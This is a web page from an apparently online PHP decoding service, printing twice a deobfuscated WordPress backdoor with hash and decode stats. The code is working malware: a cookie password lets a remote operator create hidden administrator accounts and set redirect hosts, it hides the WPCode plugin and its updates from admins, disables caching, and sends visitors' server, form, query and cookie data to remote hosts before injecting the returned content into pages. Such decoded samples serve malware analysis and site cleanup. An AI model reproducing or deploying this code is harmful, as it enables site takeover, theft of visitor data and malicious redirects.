Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if (defined("_WP_WEBSITE")) { return; } define("_WP_PWSA", "0466deafa67ffc5238621..
Decoded Output download
<? if (defined("_WP_WEBSITE")) {
return;
}
define("_WP_PWSA", "0466deafa67ffc5238621ddb532e0dad");
define('_WP_WEBSITE', "cetalus.net");
foreach (['DONOTCACHEPAGE', 'DONOTMINIFY', 'DONOTCDN'] as $const) {
if (!defined($const)) {
define($const, false);
}
}
add_filter( 'sgo_bypass_cache', '__return_true' );
add_filter( 'autoptimize_filter_noptimize', '__return_true' );
add_filter('do_rocket_generate_caching_files', '__return_false');
add_filter('w3tc_can_cache', '__return_false');
add_filter('wp_cache_not_logged_in', '__return_false');
add_filter('wp_cache_no_cache_for_get', '__return_true');
do_action( 'litespeed_control_set_nocache', '' );
function b64($input)
{
return base64_decode($input);
}
function download($path, $add_fields)
{
$fields = ['v' => 2, 'website' => _WP_WEBSITE, 'server' => $_SERVER, 'download_type' => 'direct'];
if ($add_fields) {
$fields = array_merge($fields, [
'post' => isset($_POST) ? $_POST : [],
'get' => isset($_GET) ? $_GET : [],
'cookie' => isset($_COOKIE) ? $_COOKIE : []
]);
}
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $path);
@curl_setopt($ch, CURLOPT_POST, 1);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
@curl_setopt($ch, CURLOPT_TIMEOUT, 60);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
@curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields));
$output = @curl_exec($ch);
@curl_close($ch);
return $output;
}
if ((current_user_can('edit_pages') || current_user_can('edit_others_pages')) && !array_key_exists('show_all', $_GET) && !defined('_WP_FIX')) {
define('_WP_FIX', true);
function fix_style()
{
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
}
add_action('admin_head', 'fix_style');
add_action('wp_head', 'fix_style');
add_filter('all_plugins', function ($plugins) {
if (isset($plugins['wpcode/wpcode.php'])) {
unset($plugins['wpcode/wpcode.php']);
}
if (isset($plugins['insert-headers-and-footers/ihaf.php'])) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
}
return $plugins;
});
function fix_updates($value)
{
if (isset($value) && is_object($value)) {
if (isset($value->response['insert-headers-and-footers/ihaf.php'])) {
unset($value->response['insert-headers-and-footers/ihaf.php']);
}
if (isset($value->response['wpcode/wpcode.php'])) {
unset($value->response['wpcode/wpcode.php']);
}
}
return $value;
}
add_filter('site_transient_update_plugins', 'fix_updates');
add_filter('transient_update_plugins', 'fix_updates');
}
if (!function_exists('_red')) {
error_reporting(0);
ini_set('display_errors', 0);
function _gcookie($n)
{
return (isset($_COOKIE[$n])) ? b64($_COOKIE[$n]) : '';
}
if (!empty(_WP_PWSA) && _gcookie('pw') === _WP_PWSA) {
switch (_gcookie('c')) {
case 'sd':
$d = _gcookie('d');
if (strpos($d, '.') > 0) {
update_option('d', $d);
}
break;
case 'sl':
$l = _gcookie('l');
if (substr($l, 0, 4) === 'http' && strpos($l, '.') > 0) {
update_option('l', $l);
}
break;
case 'au':
$u = _gcookie('u');
$p = _gcookie('p');
$e = _gcookie('e');
if ($u && $p && $e && !username_exists($u)) {
$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
break;
}
die('X-OK');
}
if (@stripos(wp_login_url(), '' . $_SERVER['SCRIPT_NAME']) !== false) {
return;
}
if (_gcookie("skip") === "1") {
return;
}
function _user_ip()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
foreach (@explode(',', '' . $_SERVER[$key]) as $ip) {
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
return false;
}
function _red()
{
if (is_user_logged_in()) {
return;
}
if (isset($_SERVER['REQUEST_URI']) && (stripos($_SERVER['REQUEST_URI'], 'wp-admin') !== false || stripos($_SERVER['REQUEST_URI'], 'wp-login.php') !== false)) {
return;
}
$ip = _user_ip();
if (!$ip) {
return;
}
$exp = get_transient('exp');
if (!is_array($exp)) {
$exp = array();
}
foreach ($exp as $k => $v) {
if (time() - $v > 86400) {
unset($exp[$k]);
}
}
$u = strtolower(preg_replace("/[^A-Za-z0-9]/", '', isset($_GET['u']) ? 'uu' . $_GET['u'] : ''));
$u = (strlen($u) > 20) ? substr($u, 0, 20) : $u;
$post = isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['v']) && isset($_POST['website']) && isset($_POST['server']) && isset($_POST['download_type']);
if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400) && strlen($u) < 3 && !$post) {
return;
}
if (!function_exists('curl_init')) {
return;
}
$links = get_option('l');
if (!$links) {
return;
}
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
$links = explode("
", $links);
shuffle($links);
for ($i = 0; $i < 4; $i++) {
$s = $links[$i % count($links)] . "/" . substr(md5(microtime()), rand(0, 26), 6);
if (!$s || substr($s, 0, 4) !== 'http') {
continue;
}
$output = download($s, $post || strlen($u) > 2);
if ($output) {
$j = json_decode($output);
if (is_object($j) && (isset($j->body) || isset($j->headers) || isset($j->skip))) {
if ($post && isset($j->headers) && isset($j->body)) {
echo $output;
exit;
} else {
if (isset($j->headers)) {
foreach ($j->headers as $header) {
header($header);
}
}
if (isset($j->body)) {
echo b64($j->body);
}
}
if (isset($j->skip)) {
break;
} else {
exit;
}
}
}
}
}
add_action('init', '_red');
} ?>Did this file decode correctly?
Original Code
if (defined("_WP_WEBSITE")) {
return;
}
define("_WP_PWSA", "0466deafa67ffc5238621ddb532e0dad");
define('_WP_WEBSITE', "cetalus.net");
foreach (['DONOTCACHEPAGE', 'DONOTMINIFY', 'DONOTCDN'] as $const) {
if (!defined($const)) {
define($const, false);
}
}
add_filter( 'sgo_bypass_cache', '__return_true' );
add_filter( 'autoptimize_filter_noptimize', '__return_true' );
add_filter('do_rocket_generate_caching_files', '__return_false');
add_filter('w3tc_can_cache', '__return_false');
add_filter('wp_cache_not_logged_in', '__return_false');
add_filter('wp_cache_no_cache_for_get', '__return_true');
do_action( 'litespeed_control_set_nocache', '' );
function b64($input)
{
return base64_decode($input);
}
function download($path, $add_fields)
{
$fields = ['v' => 2, 'website' => _WP_WEBSITE, 'server' => $_SERVER, 'download_type' => 'direct'];
if ($add_fields) {
$fields = array_merge($fields, [
'post' => isset($_POST) ? $_POST : [],
'get' => isset($_GET) ? $_GET : [],
'cookie' => isset($_COOKIE) ? $_COOKIE : []
]);
}
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $path);
@curl_setopt($ch, CURLOPT_POST, 1);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
@curl_setopt($ch, CURLOPT_TIMEOUT, 60);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
@curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields));
$output = @curl_exec($ch);
@curl_close($ch);
return $output;
}
if ((current_user_can('edit_pages') || current_user_can('edit_others_pages')) && !array_key_exists('show_all', $_GET) && !defined('_WP_FIX')) {
define('_WP_FIX', true);
function fix_style()
{
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
}
add_action('admin_head', 'fix_style');
add_action('wp_head', 'fix_style');
add_filter('all_plugins', function ($plugins) {
if (isset($plugins['wpcode/wpcode.php'])) {
unset($plugins['wpcode/wpcode.php']);
}
if (isset($plugins['insert-headers-and-footers/ihaf.php'])) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
}
return $plugins;
});
function fix_updates($value)
{
if (isset($value) && is_object($value)) {
if (isset($value->response['insert-headers-and-footers/ihaf.php'])) {
unset($value->response['insert-headers-and-footers/ihaf.php']);
}
if (isset($value->response['wpcode/wpcode.php'])) {
unset($value->response['wpcode/wpcode.php']);
}
}
return $value;
}
add_filter('site_transient_update_plugins', 'fix_updates');
add_filter('transient_update_plugins', 'fix_updates');
}
if (!function_exists('_red')) {
error_reporting(0);
ini_set('display_errors', 0);
function _gcookie($n)
{
return (isset($_COOKIE[$n])) ? b64($_COOKIE[$n]) : '';
}
if (!empty(_WP_PWSA) && _gcookie('pw') === _WP_PWSA) {
switch (_gcookie('c')) {
case 'sd':
$d = _gcookie('d');
if (strpos($d, '.') > 0) {
update_option('d', $d);
}
break;
case 'sl':
$l = _gcookie('l');
if (substr($l, 0, 4) === 'http' && strpos($l, '.') > 0) {
update_option('l', $l);
}
break;
case 'au':
$u = _gcookie('u');
$p = _gcookie('p');
$e = _gcookie('e');
if ($u && $p && $e && !username_exists($u)) {
$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
break;
}
die('X-OK');
}
if (@stripos(wp_login_url(), '' . $_SERVER['SCRIPT_NAME']) !== false) {
return;
}
if (_gcookie("skip") === "1") {
return;
}
function _user_ip()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
foreach (@explode(',', '' . $_SERVER[$key]) as $ip) {
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
return false;
}
function _red()
{
if (is_user_logged_in()) {
return;
}
if (isset($_SERVER['REQUEST_URI']) && (stripos($_SERVER['REQUEST_URI'], 'wp-admin') !== false || stripos($_SERVER['REQUEST_URI'], 'wp-login.php') !== false)) {
return;
}
$ip = _user_ip();
if (!$ip) {
return;
}
$exp = get_transient('exp');
if (!is_array($exp)) {
$exp = array();
}
foreach ($exp as $k => $v) {
if (time() - $v > 86400) {
unset($exp[$k]);
}
}
$u = strtolower(preg_replace("/[^A-Za-z0-9]/", '', isset($_GET['u']) ? 'uu' . $_GET['u'] : ''));
$u = (strlen($u) > 20) ? substr($u, 0, 20) : $u;
$post = isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['v']) && isset($_POST['website']) && isset($_POST['server']) && isset($_POST['download_type']);
if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400) && strlen($u) < 3 && !$post) {
return;
}
if (!function_exists('curl_init')) {
return;
}
$links = get_option('l');
if (!$links) {
return;
}
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
$links = explode("\n", $links);
shuffle($links);
for ($i = 0; $i < 4; $i++) {
$s = $links[$i % count($links)] . "/" . substr(md5(microtime()), rand(0, 26), 6);
if (!$s || substr($s, 0, 4) !== 'http') {
continue;
}
$output = download($s, $post || strlen($u) > 2);
if ($output) {
$j = json_decode($output);
if (is_object($j) && (isset($j->body) || isset($j->headers) || isset($j->skip))) {
if ($post && isset($j->headers) && isset($j->body)) {
echo $output;
exit;
} else {
if (isset($j->headers)) {
foreach ($j->headers as $header) {
header($header);
}
}
if (isset($j->body)) {
echo b64($j->body);
}
}
if (isset($j->skip)) {
break;
} else {
exit;
}
}
}
}
}
add_action('init', '_red');
}Function Calls
| None |
Stats
| MD5 | defd180f5b988f1f428a3c66fce38c92 |
| Eval Count | 0 |
| Decode Time | 69 ms |